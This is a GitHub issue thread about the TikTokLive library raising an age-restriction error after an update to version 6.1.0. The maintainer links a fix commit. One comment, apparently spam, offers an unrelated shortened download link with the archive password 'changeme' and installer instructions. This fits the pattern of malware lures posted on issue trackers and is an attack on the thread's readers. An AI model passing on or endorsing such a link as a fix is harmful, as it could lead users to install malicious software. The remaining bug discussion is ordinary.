### ISSUE TITLE
Age restricted despite session id

### ISSUE THREAD

**Issue by int3debug** [isaackogan/TikTokLive#250]
### Describe the bug

After updating from version 6.0.8 to 6.1.0 my program no longer works

Bug:
TikTokLive.client.errors.AgeRestrictedError: Age restricted stream. Cannot fetch room info. Pass sessionid to log in & bypass age restriction.

I use:
client.web.set_session_id("SESSION_ID")

### Expected Behaviour

`Should still work`

### Actual Behaviour
*If applicable, include screenshots!*

`...`

### Package Version

My version of TikTokLive is `6.1.0`.

### Operating System

- [ ] Windows
- [ x] Linux
- [ ] MacOS
- [ ] Other (Specifically, `...`)

### Anything Else

If there's anything else, add it here.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by isaackogan** [comment]
the error is no longer accurate, you are being detected & blocked by tiktok's anti-spam

**Comment by isaackogan** [comment]
hmph. maybe the error isn't accurate and something changed. i can look.

**Comment by isaackogan** [comment]
Fixed in https://github.com/isaackogan/TikTokLive/commit/d96dfcb4c526fd40d80fbfffa13c40d9de724edc

Re-open if issue re-occurs.
